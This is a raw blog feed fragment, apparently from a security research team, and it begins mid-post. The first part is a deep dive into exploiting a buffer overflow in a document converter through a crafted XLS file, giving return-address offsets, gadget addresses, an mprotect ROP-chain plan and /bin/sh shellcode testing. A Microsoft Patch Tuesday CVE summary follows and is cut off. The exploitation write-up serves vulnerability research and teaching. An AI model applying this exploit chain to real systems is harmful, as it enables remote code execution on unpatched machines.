1em;"&gt;&lt;img border="0" data-original-height="226" data-original-width="1600" height="90" src="https://3.bp.blogspot.com/-QWi0C67Y_O8/WUF1H24D7QI/AAAAAAAABPE/G8AiCk1dXUALNdB_21Ze1levSZbNlb7ogCLcBGAs/s640/image24.png" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;View of generated payload.xls&lt;br /&gt;&lt;br /&gt;We can see that the `size` field has been changed to the value set by using the script `PAYLOAD_SIZE` and the original data has been overwritten by the string of "A".&lt;br /&gt;&lt;br /&gt;It's also notable that during our testing we noticed that when increasing the `size` value we also needed to increase the value of the `MsoDrawingGroup``Length` field, which is represented in the script as `RECORD_SIZE`.As we can see, the value from 0x300 set randomly during fuzzing process was able to be increased to 0x958 without requiring any complicated data structure modifications. The reason for this size limit is easy to seeby looking at the end of our payload block:&lt;br /&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://3.bp.blogspot.com/-JEQcAEVXq8w/WUF1P9l361I/AAAAAAAABPI/tmbOBxd4j_QGh68R4_GIrv1-w8eqaSqVgCLcBGAs/s1600/image6.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="321" data-original-width="1529" height="134" src="https://3.bp.blogspot.com/-JEQcAEVXq8w/WUF1P9l361I/AAAAAAAABPI/tmbOBxd4j_QGh68R4_GIrv1-w8eqaSqVgCLcBGAs/s640/image6.png" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;As shown above, we ended up overwriting original data with "A" string just before the new worksheet structure starts. References to that structure are located in the file header so if this data is overwritten the parser will fail.&lt;br /&gt;&lt;h3 id="h.kojh2jojm4jn"&gt;Overwriting RET Address&lt;/h3&gt;Our next step is to determine how many bytes need to be manipulated to overwrite the return address. Now we will generate the pattern cycle using PEDA and use it instead of the string of "A": &lt;br /&gt;&lt;br /&gt;gdb-peda$ pattern_create&lt;br /&gt;Generate a cyclic pattern&lt;br /&gt;Set "pattern" option for basic/extended pattern type&lt;br /&gt;&lt;br /&gt;Usage:&lt;br /&gt;pattern_create size [file]&lt;br /&gt;gdb-peda$ pattern_create 0x958&lt;br /&gt;&lt;br /&gt;When we run `convert` with that modified payload we can see the following:&lt;br /&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://1.bp.blogspot.com/-yuhNvL61IIY/WUF1U69AJ6I/AAAAAAAABPM/U5OYiPeKngsC3VjU6zYUz4ra1U_t2C1ywCLcBGAs/s1600/image15.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="916" data-original-width="1462" height="400" src="https://1.bp.blogspot.com/-yuhNvL61IIY/WUF1U69AJ6I/AAAAAAAABPM/U5OYiPeKngsC3VjU6zYUz4ra1U_t2C1ywCLcBGAs/s640/image15.png" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;Now using the pattern_offset command we get offsets of values used to overwrite the RET address but also load them in some of the registers:&lt;br /&gt;&lt;br /&gt;gdb-peda$ pattern_offset HA%dA%3A%IA%eA%4A%JA&lt;br /&gt;HA%dA%3A%IA%eA%4A%JA found at offset: 264&lt;br /&gt;gdb-peda$ #EIP&lt;br /&gt;gdb-peda$ pattern_offset nA%CA%-A&lt;br /&gt;nA%CA%-A found at offset: 216&lt;br /&gt;gdb-peda$ #RBX&lt;br /&gt;gdb-peda$ pattern_offset %(A%DA%;&lt;br /&gt;%(A%DA%; found at offset: 224&lt;br /&gt;gdb-peda$ #RBP&lt;br /&gt;(...)&lt;br /&gt;&lt;br /&gt;We are able to fully control the return address by setting up the value at offset 264 of our payload and we can also fully control the beginning values of a few registers.We can make a simple test to determine whether the offsets we found are correct:&lt;br /&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://2.bp.blogspot.com/-IBd5udK2_Qs/WUF1bXtWYtI/AAAAAAAABPQ/A58GYnBUyqI8XmK7I65SCrPD9TNJgjdUQCLcBGAs/s1600/image8.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="873" data-original-width="1539" height="362" src="https://2.bp.blogspot.com/-IBd5udK2_Qs/WUF1bXtWYtI/AAAAAAAABPQ/A58GYnBUyqI8XmK7I65SCrPD9TNJgjdUQCLcBGAs/s640/image8.png" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;It's clear that everything works as expected.Taking into account that overwriting theRET address value is at offset 264 and a bigger part of the buffer is located after this offset the space left for our gadgets and shellcode equals: 0x958 - 264 = 0x850 ( 2128 ) bytes.This should allow for us to fit all necessary values and not be forced to manipulate the complicated XLS structure.&lt;br /&gt;&lt;h3 id="h.t781zvhhma1k"&gt;Building exploitation strategy&lt;/h3&gt;Before we choose one of the known methods to exploit this vulnerability we need to determine what mitigations may be implemented and used by this application and its components.&lt;br /&gt;&lt;br /&gt;To do this we are going use checksec.sh:&lt;br /&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://4.bp.blogspot.com/-j9g7pHxg8Yk/WUF1hNz4cZI/AAAAAAAABPU/vaCVDexHYWANHErJesiARDG-nKDxogrkACLcBGAs/s1600/image21.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="183" data-original-width="986" height="118" src="https://4.bp.blogspot.com/-j9g7pHxg8Yk/WUF1hNz4cZI/AAAAAAAABPU/vaCVDexHYWANHErJesiARDG-nKDxogrkACLcBGAs/s640/image21.png" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;We can see that the `convert` executable does not have ASLR support. The RELRO column has returned the "NO RELRO" status which means there is a writable region of memory at a fixed address where we can store data. &lt;br /&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://1.bp.blogspot.com/-d5TbZN6NbTs/WUF1mMxJ-8I/AAAAAAAABPY/aT-yIrT28RY1NhsfHhF-AO6GQ0_fk2oJACLcBGAs/s1600/image19.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="75" data-original-width="950" height="50" src="https://1.bp.blogspot.com/-d5TbZN6NbTs/WUF1mMxJ-8I/AAAAAAAABPY/aT-yIrT28RY1NhsfHhF-AO6GQ0_fk2oJACLcBGAs/s640/image19.png" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;Unfortunately, from the attacker perspective, all components have NX compatibility which requires us to build a ROP chain to bypass it. We also can't make a simple PLT overwrite because there is not an interesting function "loaded" via PLT.Also we prefer to bind this exploit to product version instead of platform so we also reject the GOT overwrite technique. By binding to product version it supports compromise across supported platforms. We will attempt to leveragea classic stack based buffer overflow exploit by building a ROP chain based on the `convert` binary. The role of the ROP chain will be to set the stack executable (call to mprotect syscall) and then redirectcode execution flow onto the stack where our shellcode is located.&lt;br /&gt;&lt;h2 id="h.tz5g74kb2a0a"&gt;Exploitation&lt;/h2&gt;&lt;h3 id="h.o4jwm33n8lds"&gt;Finding gadgets&lt;/h3&gt;We will begin by looking for gadgets in the `convert` binary and for this we will use `&lt;a href="https://github.com/sashs/Ropper"&gt;Ropper&lt;/a&gt;` and `&lt;a href="https://github.com/JonathanSalwan/ROPgadget"&gt;ROPgadget&lt;/a&gt;`. These two utilities show you some small but important details in gadgets searching scope. We will start by looking for the most important gadget -the syscall instruction.&lt;br /&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://2.bp.blogspot.com/-RFeoKQaTk9M/WUF1sCP6P9I/AAAAAAAABPc/Vk_pVMTwUicU0RMKN8lhbDv_zT6w2vBEQCLcBGAs/s1600/image16.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="95" data-original-width="842" height="72" src="https://2.bp.blogspot.com/-RFeoKQaTk9M/WUF1sCP6P9I/AAAAAAAABPc/Vk_pVMTwUicU0RMKN8lhbDv_zT6w2vBEQCLcBGAs/s640/image16.png" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;Unfortunately, it looks like the syscall gadget is missing, so we will need to determine how to proceed. We will look one more time at the registers state when we obtain control of code execution flow.&lt;br /&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://4.bp.blogspot.com/-4AMyuLffu-g/WUF1wWeydZI/AAAAAAAABPg/lsvLWHP0rsEVPctMHU1XcECHL_avALB3ACLcBGAs/s1600/image12.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="1011" data-original-width="1156" height="558" src="https://4.bp.blogspot.com/-4AMyuLffu-g/WUF1wWeydZI/AAAAAAAABPg/lsvLWHP0rsEVPctMHU1XcECHL_avALB3ACLcBGAs/s640/image12.png" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;The RAX register points to a pointer which points inside the code section of the `libISYSreadersh.so` library. This library has ASLR support, but having the register set on its code we can calculate a fixed delta : &lt;br /&gt;&lt;br /&gt;0x7ffff375dfb0(VALUE_AVAILABLE_IN_RAX) - 0x7ffff34cf000(IMAGE_BASE) = 0x28efb0L (delta). The delta will be used later in our ROP chain to obtain the current image base of the `libISYSreadersh.so` module. By having the image base we can easily use gadgets from this library. If we look at the size of this library and compareit to `convert` library:&lt;br /&gt;&lt;br /&gt;-rwxr-xr-x 3 icewall icewall 182K May  5 18:21 convert&lt;br /&gt;-rwxr-xr-x 3 icewall icewall  12M May  5 18:21 libISYSreadershd.so&lt;br /&gt;&lt;br /&gt;Twelve megabytes looks more promising as being a source of gadgets. A quick look for the "syscall" gadget this time ends with success:&lt;br /&gt;&lt;br /&gt;icewall@ubuntu:~/exploits/cvtisys$ ~/tools/Ropper/Ropper.py --file libISYSreadershd.so --search "syscall"&lt;br /&gt;[INFO] Load gadgets from cache&lt;br /&gt;[LOAD] loading... 100%&lt;br /&gt;[LOAD] removing double gadgets... 100%&lt;br /&gt;[INFO] Searching for gadgets: syscall&lt;br /&gt;[INFO] File: libISYSreadershd.so&lt;br /&gt;(...)&lt;br /&gt;&lt;br /&gt;0x000000000096a0dd: syscall; ret;&lt;br /&gt;(...)&lt;br /&gt;&lt;br /&gt;Ok, we are ready to start looking for interesting gadgets in order to help us set registers, read, and write among other tasks.&lt;br /&gt;&lt;br /&gt;&lt;h3 id="h.qw7cawyfntl7"&gt;Grouping gadgets&lt;/h3&gt;It's important to note that the `Ropper` utility does not show gadgets ending with the `retf` instruction as noted by the &lt;a href="https://github.com/sashs/Ropper/blob/038da32ca53bebff0dd77300a7134ca1138c0f80/ropper/arch.py%23L162"&gt;author&lt;/a&gt;. This is notable as sometimes with a limited amount of gadgets each of them has a key meaning. That's why it's good to search our binaries with differenttype of tools before we look for gadgets.&lt;br /&gt;&lt;br /&gt;Sinceit's not a capture the flag (CTF) challenge, finding all necessary gadgets can be problematic, especially at the first stage where we are limited to the small `convert` executable file.My methodology is to have a clear picture of the gadgets that we already have anddetermine what the connections are between them. The first step is to group them into categories. &lt;br /&gt;&lt;br /&gt;QWORD write&lt;br /&gt;===============&lt;br /&gt;0x0000000000415253: mov qword ptr [rbp - 0x50], rax; call qword ptr [rbx + 0x10];&lt;br /&gt;(...)&lt;br /&gt;&lt;br /&gt;QWORD read&lt;br /&gt;==============&lt;br /&gt;0x0000000000409ad0: mov rdx, qword ptr [rax]; mov rdi, rax; call qword ptr [rdx + 0x30];&lt;br /&gt;(...)&lt;br /&gt;&lt;br /&gt;SET register&lt;br /&gt;===============&lt;br /&gt;0x000000000041bf04: pop rax; ret;&lt;br /&gt;0x000000000041bff1: pop rbx; ret;&lt;br /&gt;0x0000000000409ad3: mov rdi, rax; call qword ptr [rdx + 0x30];&lt;br /&gt;(...)&lt;br /&gt;&lt;br /&gt;DEC DWORD PTR&lt;br /&gt;==================&lt;br /&gt;0x000000000042121f: dec dword ptr [rdi]; ret;&lt;br /&gt;(...)&lt;br /&gt;&lt;br /&gt;ADD reg to DWORD ptr&lt;br /&gt;=======================&lt;br /&gt;0x000000000040d0e3: add dword ptr [rax - 0x77], ecx; ret;&lt;br /&gt;(...)&lt;br /&gt;&lt;br /&gt;ADD DWORD ptr to reg&lt;br /&gt;=====================&lt;br /&gt;0x0000000000409416: add ecx, dword ptr [rax - 0x77]; ret;&lt;br /&gt;(...)&lt;br /&gt;&lt;br /&gt;That's of course just a part of discovering interesting gadgets, but hopefully demonstrates the advantages of grouping gadgets this way before attempting to create a proper ROP chain.&lt;br /&gt;&lt;h3 id="h.il0bcdsblph8"&gt;Preparing ROP class and primitives&lt;/h3&gt;We have collected as much as we could related toROP gadgets from the different categories, now we "close" them in nice primitives so building the final ROP chain will be much easier.&lt;br /&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://1.bp.blogspot.com/-h-hZenqoprE/WUF11QZD15I/AAAAAAAABPk/K4XBqXYaNWYGm7fsZtWPRj9l8F6sy5_iQCLcBGAs/s1600/image2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="672" data-original-width="1125" height="382" src="https://1.bp.blogspot.com/-h-hZenqoprE/WUF11QZD15I/AAAAAAAABPk/K4XBqXYaNWYGm7fsZtWPRj9l8F6sy5_iQCLcBGAs/s640/image2.png" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;Now we will begin the process of building the ROP chain.&lt;br /&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://2.bp.blogspot.com/-GSl2jgoBr7E/WUF16DBmXSI/AAAAAAAABPo/HtjSA3bUFPUbER6NLAtLjzOFWOaKopr0gCLcBGAs/s1600/image17.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="542" data-original-width="857" height="404" src="https://2.bp.blogspot.com/-GSl2jgoBr7E/WUF16DBmXSI/AAAAAAAABPo/HtjSA3bUFPUbER6NLAtLjzOFWOaKopr0gCLcBGAs/s640/image17.png" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;It's worth noting that we abuse the previously mentioned fact that the section headers memory area in the `convert` binary stay writable and its location is at a fixed address (See "NO RELRO" for checksec). As you can see we started using this memory area just at the beginning of ourROP chain. It's worth noting that some of the gadgets we managed to find (e.g. writeEAX) will require the preparation of a "ROP pointers" table, for example:&lt;br /&gt;&lt;br /&gt;call [reg + xx] instruction.&lt;br /&gt;&lt;br /&gt;To be able to use them we need to prepare a "ROP pointers" table and this memory area is perfect for accomplishing this task. Below is an example of its layout after the execution of a couple ROP gadgets.&lt;br /&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://2.bp.blogspot.com/-dAWwORpHWno/WUF1-QLGzMI/AAAAAAAABPs/q5Zg9seLH-UxnM4VWq7e-3kDQJNMH4G1ACLcBGAs/s1600/image18.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="185" data-original-width="545" height="216" src="https://2.bp.blogspot.com/-dAWwORpHWno/WUF1-QLGzMI/AAAAAAAABPs/q5Zg9seLH-UxnM4VWq7e-3kDQJNMH4G1ACLcBGAs/s640/image18.png" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;h3 id="h.ooxmvq8smf71"&gt;Road map&lt;/h3&gt;The additional steps for creating this ROP chain are straightforward:&lt;br /&gt;&lt;ul&gt;&lt;li&gt;Dereference the address available in RAX twice to get the address pointing to the libISYSreadershd code section&lt;/li&gt;&lt;li&gt;Subtract the delta from this address to obtainthe libISYSreadershd IMAGE BASE&lt;/li&gt;&lt;li&gt;Once we have libISYSreadershd IMAGE BASE we can start using gadgets from this library&lt;/li&gt;&lt;li&gt;Call syscall mprotect&lt;/li&gt;&lt;li&gt;Stack is executable, time to redirect code execution to our shellcode&lt;/li&gt;&lt;li&gt;P0wn3d!!!&lt;/li&gt;&lt;/ul&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://4.bp.blogspot.com/-zJsVG2vACFA/WUF2C05aHBI/AAAAAAAABPw/_cCJwWgiV9gRJKPDaGpcDzUvOMyyxBSbwCLcBGAs/s1600/image9.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="671" data-original-width="703" height="610" src="https://4.bp.blogspot.com/-zJsVG2vACFA/WUF2C05aHBI/AAAAAAAABPw/_cCJwWgiV9gRJKPDaGpcDzUvOMyyxBSbwCLcBGAs/s640/image9.png" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;h3 id="h.pb6kga78ejc2"&gt;Shellcode and first tests&lt;/h3&gt;The first step is determining how much space is left in the buffer for our shellcode.&lt;br /&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://2.bp.blogspot.com/-QWp0IR2uokM/WUF2O2I-YfI/AAAAAAAABP0/Yx70Bik_Xi0XX8s7mA55Gc4BiiVhUxn-gCLcBGAs/s1600/image11.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="260" data-original-width="593" height="280" src="https://2.bp.blogspot.com/-QWp0IR2uokM/WUF2O2I-YfI/AAAAAAAABP0/Yx70Bik_Xi0XX8s7mA55Gc4BiiVhUxn-gCLcBGAs/s640/image11.png" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;As you can see in the above image there are 136 bytes left over. For testing purpose we will use some simple "/bin/sh" shellcode that uses only 27 bytes. Finally, adding the shellcode to our ROP chain allows us to test our exploit:&lt;br /&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://1.bp.blogspot.com/-2pFkBXfZKhM/WUF2TeLdDyI/AAAAAAAABP4/TlC1kpWNWuINWq4yCGqqgNK_8UdoAWbKQCLcBGAs/s1600/image7.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="167" data-original-width="1192" height="88" src="https://1.bp.blogspot.com/-2pFkBXfZKhM/WUF2TeLdDyI/AAAAAAAABP4/TlC1kpWNWuINWq4yCGqqgNK_8UdoAWbKQCLcBGAs/s640/image7.png" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;Success!&lt;br /&gt;&lt;h3 id="h.l7dcoy3ljtua"&gt;Conclusion&lt;/h3&gt;This deep dive provides a glimpse into the process of taking a vulnerability and weaponizing it into a useable exploit. This process starts with the identification of the vulnerability and additional research into ways that it could potentially be leveraged. Finally, a deeper analysis of the environment surrounding the vulnerability is required, including mapping the address space, identification and grouping of gadgets, and finally building the ROP chain and attaching the malicious shellcode to complete the exploitation.&lt;br /&gt;&lt;br /&gt;There is a key differentiation between vulnerability discovery and analysis. Just because a vulnerability exists does not mean it is easily weaponized. In most circumstances the path to weaponization is a long, difficult, and complicated process. However, this also significantly increases the value of the vulnerability, depending on the methodology required to actually exploit.&lt;br /&gt;&lt;br /&gt;&lt;div class="feedflare"&gt;
&lt;a href="http://feeds.feedburner.com/~ff/feedburner/Talos?a=rf8H1U_G_y4:ADOE12caQdc:yIl2AUoC8zA"&gt;&lt;img src="http://feeds.feedburner.com/~ff/feedburner/Talos?d=yIl2AUoC8zA" border="0"&gt;&lt;/img&gt;&lt;/a&gt;
&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/feedburner/Talos/~4/rf8H1U_G_y4" height="1" width="1" alt=""/&gt;</description><atom:updated xmlns:atom="http://www.w3.org/2005/Atom">2017-06-15T10:41:02.340-04:00</atom:updated><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://img.youtube.com/vi/ilABOvr3wPg/default.jpg" height="72" width="72" /><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total><feedburner:origLink>http://blog.talosintelligence.com/2017/06/lexmark-perceptive-vuln-deep-dive.html</feedburner:origLink></item><item><title>Microsoft Patch Tuesday  - June 2017</title><link>http://feedproxy.google.com/~r/feedburner/Talos/~3/FtF1o6PBkRM/ms-tuesday.html</link><category>Coverage</category><category>Microsoft</category><category>ms tuesday</category><category>patch tuesday</category><category>Snort Rules</category><author>noreply@blogger.com (Nick Biasini)</author><pubDate>Tue, 13 Jun 2017 13:48:00 PDT</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-1029833275466591797.post-6245805237918382457</guid><description>Today, Microsoft has release their monthly set of security updates designed to address vulnerabilities. This month's release addresses 92 vulnerabilities with 17 of them rated critical and 75 rated important. Impacted products include Edge, Internet Explorer, Office, Sharepoint, Skype for Business, Lync, and Windows.&lt;br /&gt;&lt;br /&gt;&lt;a name='more'&gt;&lt;/a&gt;&lt;br /&gt;&lt;h3 id="h.hv5a65yfsbxp"&gt;Vulnerabilities Rated Critical&lt;/h3&gt;&lt;h4 id="h.wfa2xeyn8j0o"&gt;CVE-2017-0283&lt;/h4&gt;This is a remote code execution vulnerability in Windows Uniscribe related to improper handling of objects in memory. The attack can result in the attacker gaining full control of the affected system. This can be exploited through multiple vectors including viewing a specially crafted website or a user opening a specially crafted document file.&lt;br /&gt;&lt;h4 id="h.pd0tltwr72p2"&gt;CVE-2017-0291 / CVE-2017-0292&lt;/h4&gt;These are remote code execution vulnerability in Microsoft Windows if a user opens a specially crafted PDF file. The attack results in potential arbitrary code execution in the context of the current user and can be exploited by having the user open a specially crafted PDF file.&lt;br /&gt;&lt;h4 id="h.hv36855sqvlr"&gt;CVE-2017-0294&lt;/h4&gt;This is a remote code execution vulnerability in Microsoft Windows related to the failure to properly handle cabinet files. This is exploitable by an attacker having a user to open a specially crafted cabinet file or spoofing a network printer and tricking the user into installing a malicious cabinet file disguised as a printer driver.&lt;br /&gt;&lt;h4 id="h.diewipjyn91o"&gt;CVE-2017-8464&lt;/h4&gt;This is a remote code execution vulnerability related to the way that Windows Explorer handles LNK files. This vulnerability can be triggered if the icon of a specially crafted shortcut is displayed.&lt;br /&gt;&lt;h4 id="h.wbb780pr8m8i"&gt;CVE-2017-8496 / CVE-2017-8497&lt;/h4&gt;These are remote code execution vulnerabilities in Microsoft's Edge browser related to improper access of objects in memory. This resulting memory corruption can result in arbitrary code execution. These can be exploited by a user visiting a specially crafted website.&lt;br /&gt;&lt;h4 id="h.1z06wiwr79tf"&gt;CVE-2017-8499&lt;/h4&gt;This is a remote code execution vulnerability in the Microsoft Edge JavaScript scripting engine related to the improper handling of objects in memory. The resulting memory corruption could result in arbitrary code execution. This can be exploited by having a user view a specially crafted websites.&lt;br /&gt;&lt;h4 id="h.i1b4odd02i18"&gt;CVE-2017-8517&lt;/h4&gt;This is a remote code execution vulnerability in the JavaScript engine in Microsoft browsers related to improper handling of objects in memory. Exploitation can occur through a specially crafted website resulting in the attacker gaining taking full control of the affected system.&lt;br /&gt;&lt;h4 id="h.3l2zoggepikn"&gt;CVE-2017-8520&lt;/h4&gt;This is a remote code execution vulnerability in Microsoft Edge JavaScript scripting engine related to the way the engine handles objects in memory. The resulting corruption of memory can result in arbitrary code execution. This can be exploited by a user visiting a specially crafted webpage.&lt;br /&gt;&lt;h4 id="h.hirfaaudj8y2"&gt;CVE-2017-8522&lt;/h4&gt;This is a remote code execution vulnerability in the way the Javascript engines render when handling objects in memory in Microsoft browsers including both Internet Explorer and Edge. This can be exploited by a user visiting a specially crafted webpage.&lt;br /&gt;&lt;h4 id="h.xpxmg2ydkif2"&gt;CVE-2017-8524&lt;/h4&gt;This is a remote code execution in the JavaScript engines in Microsoft Browsers related to improper handling of objects in memory. Exploitation can occur through the viewing of a specially crafted website and can result in the attacker gaining the same user rights as the current user.&lt;br /&gt;&lt;h4 id="h.j0uggxwjmgay"&gt;CVE-2017-8527&lt;/h4&gt;This is a remote code execution vulnerability in the Windows font library related to improper handling of specially crafted embedded fonts. There are multiple ways this vulnerability can be exploited including viewing a specially crafted websites and a specially crafted document opened by the user.&lt;br /&gt;&lt;h4 id="h.a2u2lz7ol3bu"&gt;CVE-2017-8528&lt;/h4&gt;This is a remote code execution vulnerability in Windows Uniscribe related to improper handling of objects in memory. There are multiple ways this vulnerability can be exploited including viewing a specially crafted websites and a specially crafted document opened by the user.&lt;br /&gt;&lt;h4 id="h.bx2hk4byyp0"&gt;CVE-2017-8543&lt;/h4&gt;This is a remote code execution vulnerability in Windows Search related to the improper handling of objects in memory. This can be exploited by an attacker sending a specially crafted SMB message to the Windows Search service.&lt;br /&gt;&lt;h4 id="h.pdkn0478ls9v"&gt;CVE-2017-8548 / CVE-2017-8549&lt;/h4&gt;These are remote code execution vulnerabilities in the JavaScript engines of Microsoft Browsers related to improper handling of objects in memory. This can be exploited by having a user viewing a specially crafted website.&lt;br /&gt;&lt;h3 id="h.gpoya8yq4g7y"&gt;Vulnerabilities Rated as Important&lt;/h3&gt;&lt;h4 id="h.2bzwegrsdvuh"&gt;CVE-2017-0173 / CVE-2017-0215 / CVE-2017-0216 / CVE-2017-0218 / CVE-2017-0219&lt;/h4&gt;These are security feature bypass vulnerabilities in Device Guard that could allow the attacker to inject malicious code into a Windows PowerShell session. This can be exploited by an attacker with access to a local machine by injecting malicious code into a script that is trusted by the Code Integrity policy.&lt;br /&gt;&lt;h4 id="h.fbwxsdtpm92q"&gt;CVE-2017-0193&lt;/h4&gt;This is a privilege escalation vulnerability in Windows Hyper-V instruction emulation related to improper privilege level enforcement. This vulnerability could be combined with another vulnerability to take advantage of the elevated privileges while running.&lt;br /&gt;&lt;h4 id="h.e4h7wyh0j9ao"&gt;CVE-2017-0260 / CVE-2017-8506&lt;/h4&gt;These are remote code execution vulnerabilities in Microsoft Office related to improper input validation prior to loading dynamic link library (DLL) files. They can be exploited by a user opening a specially crafted office document and can result in the attacker gaining full control of the affected system.&lt;br /&gt;&lt;h4 id="h.d0s8jre8ln5i"&gt;CVE-2017-0282 / CVE-2017-0284 / CVE-2017-0285&lt;/h4&gt;This is an information disclosure vulnerability in Windows Uniscribe related to improper disclosure of the contents of its memory. This can be exploited by having a user open a specially crafted document or visit an untrusted webpage.&lt;br /&gt;&lt;h4 id="h.bo1p344p5bt2"&gt;CVE-2017-0286 / CVE-2017-0287 / CVE-2017-0288 / CVE-2017-0289&lt;/h4&gt;These are information disclosure vulnerabilities in the Windows GDI functionality that results in disclosure of the contents of memory. This can be exploited by a user opening a specially crafted document or convincing a user to access an untrusted webpage.&lt;br /&gt;&lt;h4 id="h.rc19ikpi9rkx"&gt;CVE-2017-0295&lt;/h4&gt;This is a tampering vulnerability in Microsoft Windows that allows an authenticated attacker to modify the C:\Users\DEFAULT folder structure. This is exploitable by an authenticated user prior to the target user logging on locally to the computer. Users that have previously logged on to the system are not impacted by this vulnerability.&lt;br /&gt;&lt;h4 id="h.ukhf4bu3xpr9"&gt;CVE-2017-0296&lt;/h4&gt;This is a privilege escalation vulnerability that impacts Windows 10.  The vulnerability is a buffer overrun corruption that can result in escalation of privilege. This is exploitable by local attacker executing a specially crafted application to elevate privilege.&lt;br /&gt;&lt;h4 id="h.9qf2te7i5b1f"&gt;CVE-2017-0297&lt;/h4&gt;This is a privilege escalation vulnerability in the Windows Kernel related to the improper handling of objects in memory. This is exploitable by local attacker executing a specially crafted application to elevate privilege.&lt;br /&gt;&lt;h4 id="h.lotk64hjlvjg"&gt;CVE-2017-0298&lt;/h4&gt;This is a privilege escalation vulnerability in the Windows, specifically when a DCOM object in Helppane.exe that is configured to run as the interactive user fails to improperly authenticate a client. Exploitation occurs by an attacker that is logged into the system and executed a specially crafted application that would exploit the vulnerability after another user logged on to the same system via Terminal Services or Fast User Switching.&lt;br /&gt;&lt;h4 id="h.v8sfr1cbca79"&gt;CVE-2017-0299 / CVE-2017-0300 / CVE-2017-8462&lt;/h4&gt;These are information disclosure vulnerabilities in the Windows kernel related to improper initialization of a memory address allowing the attacker to retrieve information to potentially bypass Kernel Address Space Layout Randomization (KASLR). The vulnerabilities can be exploited by an attacker that is logged on to the affected system and executes a specially crafted application.&lt;br /&gt;&lt;h4 id="h.tyo4moefstll"&gt;CVE-2017-8460&lt;/h4&gt;This is an information disclosure vulnerability in Microsoft Windows related to a user opening a specially crafted PDF file. This vulnerability can be exploited by an attacker having a user open a specially crafted PDF file.&lt;br /&gt;&lt;h4 id="h.wflwqpqh38w8"&gt;CVE-2017-8465 / CVE-2017-8466 / CVE-2017-8468&lt;/h4&gt;These are use-after-free vulnerability that can result in privilege escalation. This is specifically triggered when the Windows improperly handles objects in memory. These vulnerabilities can be exploited by the attacker logging in locally or convincing a user to execute a specially crafted application.&lt;br /&gt;&lt;h4 id="h.loqaz6h61hfq"&gt;CVE-2017-8469 / CVE-2017-8470&lt;/h4&gt;This is an information disclosure vulnerability related to the way the Windows kernel improperly initializes objects in memory. This can be triggered by an authenticated attacker executing a specially crafted application.&lt;br /&gt;&lt;h4 id="h.ahczr2jz5r7j"&gt;CVE-2017-8471 / CVE-2017-8472 / CVE-2017-8473 / CVE-2017-8474 / CVE-2017-8475 / CVE-2017-8476 / CVE-2017-8477 / CVE-2017-8478 / CVE-2017-8479 / CVE-2017-8480 / CVE-2017-8481 / CVE-2017-8482 / CVE-2017-8483 / CVE-2017-8484 / CVE-2017-8485 / CVE-2017-8488 / CVE-2017-8489 / CVE-2017-8490 / CVE-2017-8491 / CVE-2017-8492 / CVE-2017-8553&lt;/h4&gt;These are information disclosure vulnerabilities in the Windows kernel related to improper initialization of objects in memory. Exploitation can occur by an authenticated attacker executing a specially crafted application.&lt;br /&gt;&lt;h4 